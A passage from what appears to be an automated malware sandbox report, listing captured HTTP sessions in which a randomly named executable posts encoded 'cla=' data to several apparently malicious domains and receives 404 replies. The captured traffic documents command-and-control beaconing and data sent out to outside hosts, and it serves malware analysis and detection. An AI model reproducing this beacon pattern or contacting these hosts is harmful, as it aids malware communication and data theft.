                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 59 45 70 7a 78 66 74 37 62 62 6d 78 38 66 51 34 67 61 4a 41 44 4d 4f 64 78 65 59 46 4c 62 43 77 32 6e 6c 63 41 36 59 58 45 53 77 54 52 70 2f 66 59 56 39 33 4b 44 2f 6d 78 35 63 64 48 47 6a 38 34 66 56 2b 50 72 42 45 31 39 61 31 70 31 57 73 71 77 44 4f 30 61 2f 49 6a 2f 55 38 43 45 44 50 59 41 41 62 38 36 49 63 58 39 77 68 4b 4a 56 48 4d 2b 2b 56 50 6e 68 51 4a 54 4b 79 76 47 75 6b 47 59 63 4f 31 6a 68 6c 43 53 61 46 68 56 4d 6b 42 49 6f 63 41 72 79 4e 33 6d 75 5a 39 44 77 68 38 6b 49 64 45 33 71 69 6c 31 47 76 44 72 46 71 46 73 46 56 66 6a 37 31 45 52 6a 4f 2f 37 35 4a 6d 2b 37 51 6a 75 71 42 55 38 6d 57 44 42 66 6f 4f 53 79 6f 36 73 31 4f 56 71 70 2b 4c 6b 49 52 6d 76 65 45 45 74 6c 74 38 36 6e 55 6c 53 41 51 34 62 4d 41 7a 42 6e 7a 56 48 2b 59 47 35 4c 76 31 42 38 6f 52 50 50 45 67 6a 77 6e 59 45 34 5a 69 41 66 30 42 6e 59 38 71 48 2b 4d 6a 6d 72 32 34 6a 68 55 [TRUNCATED]
                                                                                                            Data Ascii: cla=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRYEpzxft7bbmx8fQ4gaJADMOdxeYFLbCw2nlcA6YXESwTRp/fYV93KD/mx5cdHGj84fV+PrBE19a1p1WsqwDO0a/Ij/U8CEDPYAAb86IcX9whKJVHM++VPnhQJTKyvGukGYcO1jhlCSaFhVMkBIocAryN3muZ9Dwh8kIdE3qil1GvDrFqFsFVfj71ERjO/75Jm+7QjuqBU8mWDBfoOSyo6s1OVqp+LkIRmveEEtlt86nUlSAQ4bMAzBnzVH+YG5Lv1B8oRPPEgjwnYE4ZiAf0BnY8qH+Mjmr24jhUPBnSe98dYjBDRLIWQWYGD9x6tkM1XYXQQNRnTdnF0ufh7vZaySS68XQbVSccGhyGq8zb0CyRR4ks1Z7aIhPt4ic+I7IyouMyL4An8vU7Ks3PJ65DBjEbpph5A8lJuyY09M4MHbInnUfwUk+Ah9bUGZIg1XEuvC/4baPhV5QBcrgXAYI3HMXzISKUii/KvK2krlHYR91yNC46+X7YkVT2iVQyCDJriRy0750uTIZ2fgBxr72vLBUIdsgBmyj6/vY0ftERC4N4gKWYHDrDsZLBY4m+FlrJ8AyuSnXD5Xw94QGhLxly3OBj1Sz8AWCcR/TnTISR7V3Vr3lbs11uNrWIF0X5skr42UDEarlYfTEzuABugJCJUZ8em68ryHs/NFl6pIQy1pD96eQO3U4PVTfBVluBM66aZ8l//ITGc2VDawlnSA2Mtg5DyA2zkv00oWMZvrYqoYpkH/NwtXPHHxJK7kIfIqEV5oW42zp1bbioz88ubKoHcMUPxoDQQwuPQbbAn740S3GwCZlEbRZe0cDqPAeX4ZoicZh9YQsWQUinWWqZBvAn1AkxfE5MlwKm2EIybPOwIIgQHbk3m8FYZA3/k52EBhBdp5Bn0KzEKassnWbFvZ0anOVej8sPfSf049QiAnKAbJDYD2UWa0Q1ilgzIlZmLlJmzVUM0z [TRUNCATED]
                                                                                                            Nov 22, 2024 07:56:21.825508118 CET691INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:21 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.549899194.85.61.76802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:23.102030039 CET354OUTGET /2pji/?cla=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:56:24.521514893 CET691INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:24 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.54991847.76.213.197802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:30.787024021 CET598OUTPOST /egqi/ HTTP/1.1
                                                                                                            Host: www.ytsd88.top
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.ytsd88.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.ytsd88.top/egqi/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 57 35 66 78 66 53 66 32 68 6a 52 31 47 66 48 6b 47 51 2f 46 49 44 64 32 30 53 31 52 50 53 4a 76 4d 48 66 47 35 31 45 38 42 6d 36 4d 4b 79 56 50 42 5a 42 69 48 56 6c 58 37 52 6e 6f 4c 36 62 58 55 35 51 51 4c 77 56 46 33 46 4f 41 32 43 47 51 41 65 63 61 6b 74 64 33 35 4b 52 39 37 63 36 38 59 6c 5a 30 6c 7a 62 38 35 2b 59 71 6c 43 4b 58 39 35 68 63 74 2f 30 65 2f 6a 66 57 64 43 38 41 4a 32 79 37 31 2f 4e 34 67 51 53 44 39 76 52 5a 46 65 6b 78 71 42 74 55 56 77 72 62 32 46 4c 65 43 38 4a 68 7a 61 49 59 68 42 32 68 73 49 36 55 62 32 50 75 57 6f 4a 6d 7a 4c 38 45 75 47 57 4a 7a 57 74 76 2f 67 30 3d
                                                                                                            Data Ascii: cla=W5fxfSf2hjR1GfHkGQ/FIDd20S1RPSJvMHfG51E8Bm6MKyVPBZBiHVlX7RnoL6bXU5QQLwVF3FOA2CGQAecaktd35KR97c68YlZ0lzb85+YqlCKX95hct/0e/jfWdC8AJ2y71/N4gQSD9vRZFekxqBtUVwrb2FLeC8JhzaIYhB2hsI6Ub2PuWoJmzL8EuGWJzWtv/g0=
                                                                                                            Nov 22, 2024 07:56:32.406029940 CET574INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:32 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 409
                                                                                                            Connection: close
                                                                                                            ETag: "66d016cf-199"
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                            Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.54992447.76.213.197802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:33.447989941 CET618OUTPOST /egqi/ HTTP/1.1
                                                                                                            Host: www.ytsd88.top
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.ytsd88.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.ytsd88.top/egqi/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 51 4b 4d 4b 54 6c 50 41 59 42 69 55 6c 6c 58 6a 42 6e 74 46 61 61 36 55 35 73 59 4c 78 70 46 33 42 65 41 32 44 32 51 41 74 30 64 6b 39 64 50 31 71 52 2f 6a 38 36 38 59 6c 5a 30 6c 7a 6e 57 35 2b 41 71 6c 7a 36 58 38 62 5a 66 6b 66 30 64 33 44 66 57 4c 43 38 4d 4a 32 79 6a 31 2b 42 57 67 53 71 44 39 72 64 5a 47 4d 4d 77 7a 78 74 57 52 77 72 50 79 30 7a 52 49 71 46 50 76 59 56 44 2f 6a 75 73 74 2b 4c 2b 42 55 48 47 46 49 6c 65 6a 59 30 7a 2f 32 33 67 70 31 39 66 68 33 69 69 55 59 30 52 47 36 42 35 65 74 46 2f 4a 76 59 64 77 70 68 75
                                                                                                            Data Ascii: cla=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBQKMKTlPAYBiUllXjBntFaa6U5sYLxpF3BeA2D2QAt0dk9dP1qR/j868YlZ0lznW5+Aqlz6X8bZfkf0d3DfWLC8MJ2yj1+BWgSqD9rdZGMMwzxtWRwrPy0zRIqFPvYVD/just+L+BUHGFIlejY0z/23gp19fh3iiUY0RG6B5etF/JvYdwphu
                                                                                                            Nov 22, 2024 07:56:35.040144920 CET574INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 409
                                                                                                            Connection: close
                                                                                                            ETag: "66d016cf-199"
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                            Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.54993047.76.213.197802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:36.111277103 CET1635OUTPOST /egqi/ HTTP/1.1
                                                                                                            Host: www.ytsd88.top
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.ytsd88.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.ytsd88.top/egqi/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 54 71 4d 4b 46 35 50 42 37 5a 69 58 6c 6c 58 39 52 6e 73 46 61 62 34 55 39 34 69 4c 78 6c 56 33 48 43 41 32 6c 69 51 52 6f 41 64 71 39 64 50 39 4b 52 2b 37 63 36 54 59 6c 4a 4f 6c 79 4c 57 35 2b 41 71 6c 77 53 58 31 70 68 66 6f 2f 30 65 2f 6a 65 5a 64 43 39 52 4a 32 71 64 31 2b 46 6f 67 42 69 44 39 4c 4e 5a 57 76 6b 77 73 42 74 59 57 77 71 49 79 31 4f 52 49 73 68 70 76 5a 78 74 2f 68 2b 73 74 66 7a 67 52 58 62 43 54 75 31 52 6f 4c 6b 4e 68 32 72 53 68 6c 6c 51 68 47 4f 38 63 4e 4d 55 49 4e 52 54 57 4e 77 64 56 36 49 75 37 38 38 43 38 66 79 53 34 62 56 70 38 58 54 59 67 41 37 47 77 62 57 78 4c 54 70 2f 64 49 42 4a 33 45 39 39 4c 52 62 75 76 78 36 55 71 78 48 41 4c 39 38 4d 68 6b 50 46 4d 77 33 67 4c 51 42 43 6e 66 37 43 31 50 36 66 33 65 73 46 6d 44 31 32 63 36 44 59 79 59 4e 44 6e 4c 4a 49 5a 6b 6b 35 6c 50 2f 2b 59 43 48 47 45 41 66 57 4c 51 42 6c 73 6c 72 57 6b 6b [TRUNCATED]
                                                                                                            Data Ascii: cla=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBTqMKF5PB7ZiXllX9RnsFab4U94iLxlV3HCA2liQRoAdq9dP9KR+7c6TYlJOlyLW5+AqlwSX1phfo/0e/jeZdC9RJ2qd1+FogBiD9LNZWvkwsBtYWwqIy1ORIshpvZxt/h+stfzgRXbCTu1RoLkNh2rShllQhGO8cNMUINRTWNwdV6Iu788C8fyS4bVp8XTYgA7GwbWxLTp/dIBJ3E99LRbuvx6UqxHAL98MhkPFMw3gLQBCnf7C1P6f3esFmD12c6DYyYNDnLJIZkk5lP/+YCHGEAfWLQBlslrWkkS4TD8wJX/RF8ec/SLfasoB7h0Us4sqjTUyiQEJj8GS4V4qw46+zpJFklNOzLhq4LiXi5bA5MRO0ET/ZqHR9cbKv5B5DfUWUWSeqz6GfsC+Or3m030rsEMB3H6XmsowY/Ead+G6GAYZpp1YOS1PMehMsRoIxmjlu1WZY+0ndG6rXrxlbZxLkUyoym588GtJjRpM/IbyMtYI6xQ+PYO1e22nDPuVfk1zKwjLgKzwkx3fiQgh8s82VfCu+q8mhDaDf8jTLXxPhHLSO4bD+rkeYUPS9jZbjwz2exApxUl8q0JtAlX97f4N/viGoK1o13KjQnbVir8Q4A0y/GiN0PfbnLQZvepNXCcIsgr8WlDDwj0yt2Rqqk9xkbGRS5Gw8U7EYf5t+hj0uURZhWq0LWOUdIAS7MlVmSlSOilQjghitohVLXhA4iKai/y5cOfVmOfDlwOKoYc8QOlXpxi5t89Sy6E0jNwkVpy0LNGXj9kuo63PE58/DD+iJ2KFx1FkeQ9eK+kjuF+J8ndYQ5DhJ416ucZ7RGmcn4dh71/DRDrGFw90qaYksLfnutKr6Ud7KSPhrTeLofrElsIPZa86zhjr6YGwJON9P2f3Cc657dXOt0/Fy740jMoWgv4nt8M7TxKDf7m6jzM3d9W3B1Vz9qNhRaNyJZFscHsHBOFJ [TRUNCATED]
                                                                                                            Nov 22, 2024 07:56:37.679708958 CET574INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 409
                                                                                                            Connection: close
                                                                                                            ETag: "66d016cf-199"
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                            Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.54993747.76.213.197802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:38.770698071 CET348OUTGET /egqi/?cla=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.ytsd88.top
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:56:40.298732042 CET574INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:56:40 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 409
                                                                                                            Connection: close
                                                                                                            ETag: "66d016cf-199"
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                            Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.549956208.91.197.27802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:46.216577053 CET628OUTPOST /hyyd/ HTTP/1.1
                                                                                                            Host: www.matteicapital.online
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.matteicapital.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.matteicapital.online/hyyd/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
